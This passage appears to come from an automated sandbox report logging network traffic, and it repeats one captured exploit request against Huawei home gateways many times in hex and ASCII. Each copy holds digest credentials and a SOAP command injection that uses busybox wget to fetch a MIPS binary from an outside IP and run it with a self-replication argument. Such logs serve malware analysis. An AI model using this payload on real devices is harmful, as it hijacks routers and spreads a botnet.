37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 